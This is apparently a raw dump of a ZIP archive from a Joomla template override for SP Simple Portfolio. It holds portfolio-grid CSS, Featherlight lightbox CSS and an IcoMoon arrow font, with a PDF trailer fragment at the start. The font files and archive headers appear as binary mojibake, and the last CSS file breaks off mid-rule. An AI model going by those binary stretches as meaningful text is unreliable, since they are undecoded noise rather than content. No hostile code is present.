<</Size 56/Root 1 0 R/Info 55 0 R/ID[<8FC48A8DB0ED424E9C8AB946B0AEF01A><98F6E72380C4834D846857ED4482BC3B>]>>
startxref
63408
%%EOF
PK!k��665flex/html/com_spsimpleportfolio/assets/img/index.htmlnu&1i�<html><head><title></title></head><body></body></html>PK!rT�hh>flex/html/com_spsimpleportfolio/assets/fonts/arrows/arrows.ttfnu&1i��0OS/2-�`cmapU�ZLgasphglyfj�p�headml-\6hhea���$hmtx�� loca���maxp
	� name���<postH �������3	@����@�@ 8
 ����� ���������797979��)�'	7)C��C�7{D��E���)�	C�7C�D�D�EE����	'	7�4��A����������		/��4��A����&C_<���������)����)��
2F^v�@"N.
4Z		@	"	N		4	
4ZarrowsVersion 1.0arrowsarrowsarrowsRegulararrowsFont generated by IcoMoon.PK!�a�-->flex/html/com_spsimpleportfolio/assets/fonts/arrows/index.htmlnu&1i�<html><body bgcolor="#FFFFFF"></body></html>
PK!���>flex/html/com_spsimpleportfolio/assets/fonts/arrows/arrows.eotnu&1i�h�LPC&��arrowsRegularVersion 1.0arrows�0OS/2-�`cmapU�ZLgasphglyfj�p�headml-\6hhea���$hmtx�� loca���maxp
	� name���<postH �������3	@����@�@ 8
 ����� ���������797979��)�'	7)C��C�7{D��E���)�	C�7C�D�D�EE����	'	7�4��A����������		/��4��A����&C_<���������)����)��
2F^v�@"N.
4Z		@	"	N		4	
4ZarrowsVersion 1.0arrowsarrowsarrowsRegulararrowsFont generated by IcoMoon.PK!�5���>flex/html/com_spsimpleportfolio/assets/fonts/arrows/arrows.svgnu&1i�<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" >
<svg xmlns="http://www.w3.org/2000/svg">
<metadata>Generated by IcoMoon</metadata>
<defs>
<font id="arrows" horiz-adv-x="1024">
<font-face units-per-em="1024" ascent="960" descent="-64" />
<missing-glyph horiz-adv-x="1024" />
<glyph unicode="&#x20;" d="" horiz-adv-x="512" />
<glyph unicode="&#xe600;" d="M808.896 890.708l-66.66 68.618-527.13-511.983 527.13-512.017 66.66 68.631-456.425 443.385z" />
<glyph unicode="&#xe601;" d="M281.784 959.326l-66.701-68.563 456.537-443.454-456.537-443.334 66.682-68.649 527.153 511.983z" />
<glyph unicode="&#xe602;" d="M750.442 447.331l-460.811-512.005-16.073 14.472 447.756 497.533-447.756 497.533 16.062 14.462 460.822-511.995z" />
<glyph unicode="&#xe603;" d="M302.657 447.326l447.782-497.527-16.063-14.473-460.816 512 460.816 512 16.063-14.473-447.782-497.527z" />
</font></defs></svg>PK!��3��?flex/html/com_spsimpleportfolio/assets/fonts/arrows/arrows.woffnu&1i�wOFF�hOS/2``-cmaphLLU�Zgasp�glyf���j�head�66ml-hhea�$$��hmtx  �loca$��maxp8  
	nameX<<���post�  �������3	@����@�@ 8
 ����� ���������797979��)�'	7)C��C�7{D��E���)�	C�7C�D�D�EE����	'	7�4��A����������		/��4��A����&C_<���������)����)��
2F^v�@"N.
4Z		@	"	N		4	
4ZarrowsVersion 1.0arrowsarrowsarrowsRegulararrowsFont generated by IcoMoon.PK!�a�--7flex/html/com_spsimpleportfolio/assets/fonts/index.htmlnu&1i�<html><body bgcolor="#FFFFFF"></body></html>
PK!W&~�Gflex/html/com_spsimpleportfolio/assets/css/featherlight.gallery.min.cssnu&1i�/**
 * Featherlight Gallery – an extension for the ultra slim jQuery lightbox
 * Version 1.2.0 - http://noelboss.github.io/featherlight/
 *
 * Copyright 2015, Noël Raoul Bossart (http://www.noelboss.com)
 * MIT Licensed.
**/
@media all{.featherlight-next,.featherlight-previous{display:block;position:absolute;top:25px;right:25px;bottom:0;left:80%;cursor:pointer;-webkit-touch-callout:none;-webkit-user-select:none;-khtml-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;background:rgba(0,0,0,0)}.featherlight-previous{left:25px;right:80%}.featherlight-next:hover,.featherlight-previous:hover{background:rgba(255,255,255,.25)}.featherlight-next span,.featherlight-previous span{display:none;position:absolute;top:50%;left:5%;width:82%;text-align:center;font-size:80px;line-height:80px;margin-top:-40px;text-shadow:0 0 5px #fff;color:#fff;font-style:normal;font-weight:400}.featherlight-next span{right:5%;left:auto}.featherlight-next:hover span,.featherlight-previous:hover span{display:inline-block}.featherlight-loading .featherlight-next,.featherlight-loading .featherlight-previous{display:none}}@media only screen and (max-device-width:1024px){.featherlight-next:hover,.featherlight-previous:hover{background:0 0}.featherlight-next span,.featherlight-previous span{display:block}}@media only screen and (max-width:1024px){.featherlight-next,.featherlight-previous{top:10px;right:10px;left:85%}.featherlight-previous{left:10px;right:85%}.featherlight-next span,.featherlight-previous span{margin-top:-30px;font-size:40px}}PK!$��4�4@flex/html/com_spsimpleportfolio/assets/css/spsimpleportfolio.cssnu&1i�
.sp-simpleportfolio {
	padding: 0;
}
.sp-simpleportfolio:before,
.sp-simpleportfolio:after {
	content: " ";
	display: table;
}
.sp-simpleportfolio:after {
	clear: both;
}
.sp-simpleportfolio .sp-simpleportfolio-img {
	display: block;
	max-width: 100%;
	height: auto;
}
.sp-simpleportfolio .sp-simpleportfolio-filter {
	text-align: center;
	margin-bottom: 30px;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul {
	list-style: none;
	padding: 0;
	margin: 0;
	display: inline-table;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul > li {
	float: left;
	display: block;
	border:none;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul > li > a {
	display: inline-block;
	padding: 5px 13px;
	margin:0;
	line-height:1.9;
	text-decoration: none;
	border-radius: 4px;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li > a {
    background:transparent;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li span.simple-divider {
	display:block;
	float:left;
	color:#ddd;
	font-size:110%;
	line-height:1.9;
	padding-top: 5px;
	padding-bottom: 5px;
	margin-left:-5px;
}
#mod-sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li span.simple-divider {
	display:inline-block;
	float:left;
	color:#ddd;
	font-size:110%;
	line-height:1.9;
	margin-left:0;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.flex > li > a {
	background: #3D3D3D;
	color: #fff;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul > li.no-margin {
	float: left;
	display: block;
	margin: 0 auto;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul > li.no-margin > a  {
	border-radius:0;
	padding: 5px 20px;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul > li.no-margin:first-child > a  {
	border-radius: 4px 0 0 4px;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul > li.no-margin:last-child > a  {
	border-radius: 0 4px 4px 0;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.flex > li.active > a {
	color: #fff;
}
.sp-simpleportfolio .sp-simpleportfolio-items {
	margin: -15px;
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-overlay-wrapper .sp-simpleportfolio-overlay {
	margin-right:-1px;
}
.sp-simpleportfolio .sp-simpleportfolio-items .sp-simpleportfolio-item:first-child .sp-simpleportfolio-overlay-wrapper {
	margin-right:-1px;
	margin-bottom:0px;
}
.sp-simpleportfolio.layout-gallery-nospace .sp-simpleportfolio-items {
	margin: 0;
}
.sp-simpleportfolio.layout-gallery-nospace .sp-simpleportfolio-item {
	padding: 0;
}
.sp-simpleportfolio .sp-simpleportfolio-columns-2 .sp-simpleportfolio-item {
	width: 50%;
}
.sp-simpleportfolio .sp-simpleportfolio-columns-3 .sp-simpleportfolio-item {
	width: 33.3333%;
}
.sp-simpleportfolio .sp-simpleportfolio-columns-4 .sp-simpleportfolio-item {
	width: 25%;
}
.sp-simpleportfolio .sp-simpleportfolio-item {
	float: left;
	padding: 15px;
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	-o-box-sizing: border-box;
	-ms-box-sizing: border-box;
	box-sizing: border-box;
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-overlay-wrapper {
	position: relative;
	overflow: hidden;
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-overlay-wrapper .sp-simpleportfolio-icon-video {
	display: inline-block;
	position: absolute;
	width: 64px;
	height: 64px;
	max-width: 64px;
	max-height: 64px;
	background: url(../img/icon-play.svg) no-repeat 50% 50%;
	background-size: contain;
	top: 50%;
	left: 50%;
	margin-top: -33px;
	margin-left: -33px;
	z-index: 1;
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-overlay-wrapper .sp-simpleportfolio-img {
	float: left;
	padding:0;
	margin:0;
	-webkit-transform: scale3d(1, 1, 1);
	transform: scale3d(1, 1, 1);
	-webkit-transition: all 400ms ease-in-out;
	transition: all 400ms ease-in-out;
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-overlay-wrapper .sp-simpleportfolio-overlay {
	opacity: 0;
	transition: 
	  opacity 400ms ease-in, 
	  margin 250ms ease;
	-webkit-transition: 
	  opacity 400ms ease-in, 
	  margin 250ms ease;
	position: absolute;
	top: 0;
	bottom: 0;
	left: 0;
	right: 0;
	text-align: center;
	padding: 10px;
	margin:0;
	border:0;
	background: rgba(0, 0, 0, 0.4);
	color: #fff;
	z-index: 2;
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-overlay-wrapper .sp-simpleportfolio-overlay h3 {
	font-size: 150%;
	line-height: 1;
	margin: 0;
	color: #fff;
}
.sp-simpleportfolio .sp-simpleportfolio-item:hover .sp-simpleportfolio-overlay {
	opacity: 1;
	margin:12px;
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-info:hover {
	background: #333;
	color: #fff;
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-info:hover h3 > a {
	color: #fff;
}
.sp-simpleportfolio .sp-simpleportfolio-item:hover .sp-vertical-middle .sp-simpleportfolio-title,
.sp-simpleportfolio .sp-simpleportfolio-item:hover .sp-vertical-middle .sp-simpleportfolio-tags {
	opacity: 1;
	-webkit-transform: translate3d(0, 0, 0);
	transform: translate3d(0, 0, 0);
}
.sp-simpleportfolio .sp-simpleportfolio-item:hover .sp-simpleportfolio-img {
  -webkit-transform: scale3d(1.15, 1.15, 1);
  transform: scale3d(1.15, 1.15, 1);
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-info {
	background: #f5f5f5;
	padding: 20px;
	font-size: 13px;
	line-height: 13px;
	-webkit-transition: all 400ms ease;
	transition: all 400ms ease;
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-info h3 {
	margin: 0 0 10px;
	padding: 0;
	font-size: 16px;
	line-height: 16px;
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-info h3 > a {
	text-decoration: none;
	color: #000;
	-webkit-transition: color 400ms;
	transition: color 400ms;
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-vertical-middle {
	height: 100%;
	width: 100%;
	display: table;
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-vertical-middle > div {
	display: table-cell;
	vertical-align: middle;
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-vertical-middle > div .sp-simpleportfolio-title {
	margin-top: 20px;
	display: inline-block;
	font-size: 140%;
	line-height: 1.2;
	letter-spacing: 1px;
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-vertical-middle > div .sp-simpleportfolio-title a {
	text-decoration: none;
	color: #fff;
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-vertical-middle .sp-simpleportfolio-title {
	opacity: 0;
	-webkit-transform: translate3d(0, 15px, 0);
	transform: translate3d(0, 15px, 0);
	-webkit-transition: all 400ms cubic-bezier(0.645, 0.045, 0.355, 1.000) 150ms;
	transition: all 400ms cubic-bezier(0.645, 0.045, 0.355, 1.000) 150ms;
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-vertical-middle .sp-simpleportfolio-tags {
	opacity: 0;
	-webkit-transform: translate3d(0, 15px, 0);
	transform: translate3d(0, 15px, 0);
	-webkit-transition: all 400ms cubic-bezier(0.645, 0.045, 0.355, 1.000) 300ms;
	transition: all 400ms cubic-bezier(0.645, 0.045, 0.355, 1.000) 300ms;
}
.sp-simpleportfolio-info .sp-simpleportfolio-tags i.fa,
.sp-simpleportfolio-info .sp-simpleportfolio-tags i.fas,
.sp-simpleportfolio-info .sp-simpleportfolio-tags i.far {
	margin-right:5px;
	line-height:1;
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-overlay .sp-vertical-middle a.btn-zoom,
.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-overlay .sp-vertical-middle a.btn-view {
	display: inline-table;
	width:25%;
	padding: 8px 15px;
	margin: 3px 5px;
	font-size: 12px;
	letter-spacing: 2px;
	line-height:1.2;
	text-align: center;
	vertical-align: middle;
	cursor: pointer;
	color: #fff;
	border:0;
	border-radius: 3px;
	box-shadow:0 0 8px rgba(0,0,0,.2);
	text-decoration: none;
	text-transform: uppercase;
	opacity: 0;
	-webkit-transition: all 300ms cubic-bezier(0.645, 0.045, 0.280, 0.995);
	transition: all 300ms cubic-bezier(0.645, 0.045, 0.280, 0.995);
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-overlay .sp-vertical-middle a.btn-view-only {
	background:transparent!important;
	box-shadow:none!important;
	display:block;
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-overlay .sp-vertical-middle a.btn-view-only > i {
	color:#fff;
	font-size:32px;
	padding:15px;
	transform: scale(0.5);
	text-shadow:1px 2px 3px rgba(0,0,0,.2);
	-webkit-transition: all 400ms cubic-bezier(0.645, 0.045, 0.355, 1.000) 150ms;
	-moz-transition: all 400ms cubic-bezier(0.645, 0.045, 0.355, 1.000) 150ms;
	transition: all 400ms cubic-bezier(0.645, 0.045, 0.355, 1.000) 150ms;
}
.sp-simpleportfolio .sp-simpleportfolio-item:hover .sp-simpleportfolio-overlay .sp-vertical-middle a.btn-view-only > i {
	transform: scale(1);
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns > a.btn-zoom-icon {
	width:64px;
	height:64px;
	padding:10px 12px;
	line-height:1.2;
	border-radius:4px;
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns > a.btn-zoom-icon > i {
	font-size:130%;
	line-height:1.2;
	color:#fff;
}
.sp-simpleportfolio .sp-simpleportfolio-item:hover .sp-simpleportfolio-overlay .sp-vertical-middle a.btn-zoom,
.sp-simpleportfolio .sp-simpleportfolio-item:hover .sp-simpleportfolio-overlay .sp-vertical-middle a.btn-view {
  	opacity: 1;
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns a.btn-zoom:hover,
.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns a.btn-view:hover,
.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns a.btn-zoom-icon:hover {
	background: #333;
	border-color: #333;
}
.sp-simpleportfolio .sp-simpleportfolio-image {
 	 margin-bottom: 20px;
}
.sp-simpleportfolio .sp-simpleportfolio-details {
	margin:30px auto;
}
.sp-simpleportfolio .sp-simpleportfolio-description {
	width: 72%;
	float: left;
}
.sp-simpleportfolio .sp-simpleportfolio-description > h2 {
  margin: 0 0 20px;
}
.sp-simpleportfolio .sp-simpleportfolio-meta {
	width: 25%;
	margin:10px 0;
	float: right;
	padding-left: 20px;
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	-ms-box-sizing: border-box;
	-o-box-sizing: border-box;
	box-sizing: border-box;
}
.sp-simpleportfolio .sp-simpleportfolio-meta > div {
	margin:0 0 20px 0;
	padding-bottom: 15px;
}
.sp-simpleportfolio .sp-simpleportfolio-meta .sp-module > .sp-module-content {
	margin:0 auto;
}
.sp-simpleportfolio .sp-simpleportfolio-meta > div:last-child {
	margin-bottom: 0;
	padding-bottom: 0;
	border-bottom: 0;
}
.sp-simpleportfolio .sp-simpleportfolio-meta h3 {
	font-size:130%;
	margin:0 0 15px;
}
.sp-simpleportfolio .sp-simpleportfolio-meta .sp-simpleportfolio-client-avatar {
	margin:7px 0;
}
.sp-simpleportfolio .sp-simpleportfolio-meta .no-labels {
	width:auto;
	margin:0;
}
.sp-simpleportfolio .sp-simpleportfolio-meta .no-labels + hr {
	margin:5px auto 5px;
	padding:10px 0 7px;
	line-height:1;
}
.sp-simpleportfolio .sp-simpleportfolio-meta .sp-module-content i {
	font-size: 2.1em;
	width:1.3em;
	margin:-4px 0 0;
	vertical-align:top;
	opacity:0.6;
}
.sp-simpleportfolio .sp-simpleportfolio-meta .sp-module h3 > i.fa,
.sp-simpleportfolio .sp-simpleportfolio-meta .sp-module h3 > i.fas,
.sp-simpleportfolio .sp-simpleportfolio-meta .sp-module h3 > i.far {
	font-size: .85em;
	margin:1px 2px 0 0;
	vertical-align:top;
	line-height:1.27;
	opacity:0.4;
	-webkit-transition: all 250ms ease-in-out;
	transition: all 250ms ease-in-out;
}
.sp-simpleportfolio .sp-simpleportfolio-meta .sp-module:hover h3 > i.fa,
.sp-simpleportfolio .sp-simpleportfolio-meta .sp-module:hover h3 > i.fas,
.sp-simpleportfolio .sp-simpleportfolio-meta .sp-module:hover h3 > i.far {
	opacity:0.77;
}
.sp-simpleportfolio .sp-simpleportfolio-meta .sp-module h3 > .fa-calendar-alt {
	font-size: .8em;
	margin:-2px 3px 0 0;
}
.sp-simpleportfolio .sp-simpleportfolio-meta .sp-module > .divider {
  margin:-1px auto 10px;
}
.sp-simpleportfolio .sp-simpleportfolio-meta h4 {
	font-size: 16px;
	font-weight: bold;
	margin: 0 0 10px;
}
.sp-simpleportfolio .sp-simpleportfolio-embed {
	position: relative;
	display: block;
	height: 0;
	padding-bottom: 56.25%;
	overflow: hidden;
}
.sp-simpleportfolio .sp-simpleportfolio-embed iframe,
.sp-simpleportfolio .sp-simpleportfolio-embed embed,
.sp-simpleportfolio .sp-simpleportfolio-embed object,
.sp-simpleportfolio .sp-simpleportfolio-embed video {
	position: absolute;
	top: 0;
	bottom: 0;
	left: 0;
	width: 100%;
	height: 100%;
	border: 0;
}
.sp-simpleportfolio-lightbox {
	display: none;
}
@media only screen and (max-width : 992px) {
  .sp-simpleportfolio .sp-simpleportfolio-items .sp-simpleportfolio-item {
    width: 50%;
  }
	iframe.sp-simpleportfolio-lightbox {
		width:100%;
		height:100%;
	}
	.featherlight-iframe .featherlight-content {
		width:80%;
		height:60%;
	}
}

@media only screen and (max-width: 768px) {
  .sp-simpleportfolio .sp-simpleportfolio-description {
    width: auto;
    float: none;
    margin-bottom: 30px;
  }
  .sp-simpleportfolio .sp-simpleportfolio-meta {
    width: auto;
    float: none;
    padding-left: 0;
  }
	.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-overlay .sp-vertical-middle a.btn-zoom,
	.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-overlay .sp-vertical-middle a.btn-view {
	  width:30%;
	}
	.featherlight-iframe .featherlight-content {
		width:90%;
		height:55%;
	}
}

@media only screen and (max-width : 480px) {
  .sp-simpleportfolio .sp-simpleportfolio-items .sp-simpleportfolio-item {
    width: 100%;
  }
	.featherlight-iframe .featherlight-content {
		width:90%;
		height:45%;
	}
}PK!5�@�
�
;flex/html/com_spsimpleportfolio/assets/css/featherlight.cssnu&1i�/**
 * Featherlight – ultra slim jQuery lightbox
 * Version 1.2.0 - http://noelboss.github.io/featherlight/
 *
 * Copyright 2015, Noël Raoul Bossart (http://www.noelboss.com)
 * MIT Licensed.
**/
@media all {
	.featherlight {
		display: none;
		/* dimensions: spanning the background from edge to edge */
		position:fixed;
		top: 0; 
		right: 0; 
		bottom: 0; 
		left: 0;
		z-index: 9997;
		/* position: centering content */
		text-align: center;
		/* insures that the ::before pseudo element doesn't force wrap with fixed width content; */
		white-space: nowrap;
		/* styling */
		/*cursor: pointer;
		background: #333;*/
		/* IE8 "hack" for nested featherlights */
		background: rgba(0, 0, 0, 0);
	}

	/* support for nested featherlights. Does not work in IE8 (use JS to fix) */
	.featherlight:last-of-type {
		background-color: #fff;
		background-color: rgba( 255, 255, 255, .85);
	}

	.featherlight:before {
		/* position: trick to center content vertically */
		content: '';
		display: inline-block;
		height: 100%;
		vertical-align: middle;
		margin-right: -0.25em;
		
	}

	.featherlight .featherlight-content {
		/* make content container for positioned elements (close button) */
		position: relative;

		/* position: centering vertical and horizontal */
		text-align: left;
		vertical-align: middle;
		display: inline-block;

		/* dimensions: cut off images */
		overflow: auto;
		padding-bottom:0;
		border-bottom:0;

		/* dimensions: handling small or empty content */
		min-width:  20%;

		/* dimensions: handling large content */
		margin-left: 5%;
		margin-right: 5%;
		max-height: 95%;

		/* styling */
		/*
		background: #777;
		background: rgba(205,205,205,.9);
		cursor: auto;
		*/
		-ms-touch-action: none;
		touch-action: none;
		-webkit-box-shadow: 0 0 3.125em rgba( 0, 0, 0, .5);  
    	box-shadow: 0 0 3.125em rgba( 0, 0, 0, .5);

		/* reset white-space wrapping */
		white-space: normal;
	}

	/* contains the content */
	.featherlight .featherlight-inner {
		/* make sure its visible */
		display: block;
	}
	
	.featherlight-loading {
		left:0;
		top:0;
		width:100%;
		height:100%;
		background: #fff url('data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCAzMiAzMiIgd2lkdGg9IjQ0IiBoZWlnaHQ9IjQ0Ij4NCiAgPHBhdGggb3BhY2l0eT0iLjI1IiBmaWxsPSIjNTU1IiBkPSJNMTYgMCBBMTYgMTYgMCAwIDAgMTYgMzIgQTE2IDE2IDAgMCAwIDE2IDAgTTE2IDQgQTEyIDEyIDAgMCAxIDE2IDI4IEExMiAxMiAwIDAgMSAxNiA0Ii8+DQogIDxwYXRoIG9wYWNpdHk9Ii43NyIgZmlsbD0iIzU1NSIgZD0iTTE2IDAgQTE2IDE2IDAgMCAxIDMyIDE2IEwyOCAxNiBBMTIgMTIgMCAwIDAgMTYgNHoiPg0KICAgIDxhbmltYXRlVHJhbnNmb3JtIGF0dHJpYnV0ZU5hbWU9InRyYW5zZm9ybSIgdHlwZT0icm90YXRlIiBmcm9tPSIwIDE2IDE2IiB0bz0iMzYwIDE2IDE2IiBkdXI9IjAuOHMiIHJlcGVhdENvdW50PSJpbmRlZmluaXRlIiAvPg0KICA8L3BhdGg+DQo8L3N2Zz4=') center center no-repeat!important;
	}


	.featherlight .featherlight-close-icon {
		/* styling */
		cursor: pointer;
		text-align: center;
		font: Arial, sans-serif;
	}


	.featherlight .featherlight-image {
		/* styling */
		width: 100%;
		padding: 0;
		border-bottom: 0;
	}


	.featherlight-iframe .featherlight-content {
		/* removed the border for image croping since iframe is edge to edge */
		border-bottom: 0;
		padding: 0;
	}

	.featherlight iframe {
		/* styling */
		border: none;
	}
}

/* handling phones and small screens */
@media only screen and (max-width: 1024px) {
	.featherlight .featherlight-content {
		/* dimensions: maximize lightbox with for small screens */

		max-height: 98%;

	}
	.featherlight .featherlight-image {
		
	}

}
PK!���aaCflex/html/com_spsimpleportfolio/assets/css/featherlight.gallery.cssnu&1i�/**
 * Featherlight Gallery – an extension for the ultra slim jQuery lightbox
 * Version 1.2.0 - http://noelboss.github.io/featherlight/
 *
 * Copyright 2015, Noël Raoul Bossart (http://www.noelboss.com)
 * MIT Licensed.
**/
@font-face {
	font-family: 'arrows';
	src:url('../fonts/arrows/arrows.eot?-ylueui');
	src:url('../fonts/arrows/arrows.eot?#iefix-ylueui') format('embedded-opentype'),
		url('../fonts/arrows/arrows.woff?-ylueui') format('woff'),
		url('../fonts/arrows/arrows.ttf?-ylueui') format('truetype'),
		url('../fonts/arrows/arrows.svg?-ylueui#arrows') format('svg');
	font-weight: normal;
	font-style: normal;
}

[class^="arrow-"], [class*=" arrow-"] {
	font-family: 'arrows';
	speak: none;
	font-style: normal;
	font-weight: normal;
	font-variant: normal;
	text-transform: none;
	line-height: 1;

	/* Better Font Rendering =========== */
	-webkit-font-smoothing: antialiased;
	-moz-osx-font-smoothing: grayscale;
}

.arrow-left:before {
	content: "\e600";
}

.arrow-right:before {
	content: "\e601";
}

.arrow-next-thin:before {
	content: "\e602";
	font-weight:600;
}

.arrow-previous-thin:before {
	content: "\e603";
	font-weight:600;
}

@media all {
	.featherlight-iframe .featherlight-next {
		right:0;
		left:100%;
	}
	.featherlight-iframe .featherlight-previous {
		left:0;
		right:100%;
	}
	

	.featherlight-image .featherlight-next,
	.featherlight-image .featherlight-previous {
		-webkit-transition:all .3s ease-in-out;
		-moz-transition:all .3s ease-in-out;
		-o-transition:all .3s ease-in-out;
		-ms-transition:all .3s ease-in-out;
		transition:all .3s ease-in-out;
	}
	.featherlight .featherlight-next,
	.featherlight .featherlight-previous {
		display: block;
		position: fixed;
	    z-index:9999;
		height:100%;
		margin-top:0;
		top: 0%;
		right:0;
		bottom: 0;
		left: 92%;
		cursor: pointer;
		/* preventing text selection */
		-webkit-touch-callout: none;
		-webkit-user-select: none;
		-khtml-user-select: none;
		-moz-user-select: none;
		-ms-user-select: none;
		user-select: none;
		/* IE9 hack, otherwise navigation doesn't appear */
		background: rgba(0,0,0,0);
		-webkit-transition: all 200ms cubic-bezier(0.645, 0.045, 0.280, 0.995);
		transition: all 200ms cubic-bezier(0.645, 0.045, 0.280, 0.995);
	}

	.featherlight .featherlight-previous {
		left: 0;
		right: 92%;
	}
	
	.featherlight-next span,
	.featherlight-previous span {
		/*display: none;*/
		position: fixed;
		top: 50%;
		left: 3%;
		width: 60px;
		font-size: 38px;
		height:112px;
		line-height:115px;
		border-radius: 3px;
		/* center horizontally */
		text-align: center;
		text-shadow:1px 1px 2px rgba(0,0,0,.05);
		/* center vertically */
		margin-top: -56px;
		color: #fff;
		font-style: normal;
		font-weight: 800;
		background-color: #555;
		background-color: rgba( 0, 0, 0, .2);
		-webkit-transition: all 200ms cubic-bezier(0.645, 0.045, 0.280, 0.995);
		transition: all 200ms cubic-bezier(0.645, 0.045, 0.280, 0.995);
	}
	.featherlight-next span {
		right: 3%;
		left: auto;
	}
	.featherlight-next span i {
		
		margin-left:5px;
	}
	.featherlight-previous span i {
		
		margin-right:0;
	}
	
	.featherlight-next:hover span,
	.featherlight-previous:hover span {
		display: inline-block;
	}
	.featherlight-next span:hover,
	.featherlight-previous span:hover {

		background-color: #444;
		background-color: rgba( 0, 0, 0, .35);
	}

	/* Hide navigation while loading */
	.featherlight-loading .featherlight-previous, .featherlight-loading .featherlight-next {
		
	}

	.featherlight .featherlight-image {
		width: 100%;
	}
	
	.featherlight .featherlight-close-icon {
		width: 1.6em;
		height: 1.6em;
		line-height: 1.57em;
		text-align: center;
		background-color: #999;
		background-color: rgba(0,0,0,.2);
		border-radius: 50%;
		position: fixed;
		z-index: 10002;
		top: 1.8em;
		right: 1.8em;
		border: none;
		-webkit-transform: scale3d(1, 1, 1);
		transform: scale3d(1, 1, 1);
		-webkit-transition: all .3s ease;
		transition: all .3s ease;
		font-size:1.6em;
		cursor: pointer;
		color: #fff;
	}
	.mobile .featherlight .featherlight-close-icon {
		width: 1.7em;
		height: 1.7em;
		line-height: 1.68em;
		text-align: center;
		background-color: #999;
		background-color: rgba(0,0,0,.2);
		border-radius: 50%;
		position: fixed;
		z-index: 10002;
		top: 0.9em;
		right: 0.9em;
		border: none;
		-webkit-transform: scale3d(1, 1, 1);
		transform: scale3d(1, 1, 1);
		-webkit-transition: all .3s ease;
		transition: all .3s ease;
		font-size:2.25em;
		cursor: pointer;
		color: #fff;
	}
	.featherlight .featherlight-close-icon:hover {
		background-color: #777;
		background-color: rgba(0, 0, 0, .4);
		-webkit-transform: scale3d(1.2, 1.2, 1);
		transform: scale3d(1.2, 1.2, 1);
	}		
	
}

/* Always display arrows on touch devices */
@media only screen and (max-device-width: 992px){
	.featherlight-next:hover,
	.featherlight-previous:hover {
		background: none;
	}
	.featherlight-next span,
	.featherlight-previous span {
		display: block;
	}
}

/* handling phones and small screens */
@media only screen and (max-width: 992px) {
	

	.featherlight-previous span {
		left: 0;
	}
	.featherlight-next span {
		right: 0;
	}

	.featherlight-next span,
	.featherlight-previous span {
		font-size: 40px;

	}
}
PK!�x}��?flex/html/com_spsimpleportfolio/assets/css/featherlight.min.cssnu&1i�/**
 * Featherlight - ultra slim jQuery lightbox
 * Version 1.2.0 - http://noelboss.github.io/featherlight/
 *
 * Copyright 2015, Noël Raoul Bossart (http://www.noelboss.com)
 * MIT Licensed.
**/
@media all{.featherlight{display:none;position:fixed;top:0;right:0;bottom:0;left:0;z-index:2;text-align:center;white-space:nowrap;cursor:pointer;background:#333;background:rgba(0,0,0,0)}.featherlight:last-of-type{background:rgba(0,0,0,.8)}.featherlight:before{content:'';display:inline-block;height:100%;vertical-align:middle;margin-right:-.25em}.featherlight .featherlight-content{position:relative;text-align:left;vertical-align:middle;display:inline-block;overflow:auto;padding:25px 25px 0;border-bottom:25px solid transparent;min-width:30%;margin-left:5%;margin-right:5%;max-height:95%;background:#fff;cursor:auto;white-space:normal}.featherlight .featherlight-inner{display:block}.featherlight .featherlight-close-icon{position:absolute;top:0;right:0;line-height:25px;width:25px;cursor:pointer;text-align:center;font:Arial,sans-serif;background:#fff;background:rgba(255,255,255,.3);color:#000}.featherlight .featherlight-image{width:100%}.featherlight-iframe .featherlight-content{border-bottom:0;padding:0}.featherlight iframe{border:0}}@media only screen and (max-width:1024px){.featherlight .featherlight-content{margin-left:10px;margin-right:10px;max-height:98%;padding:10px 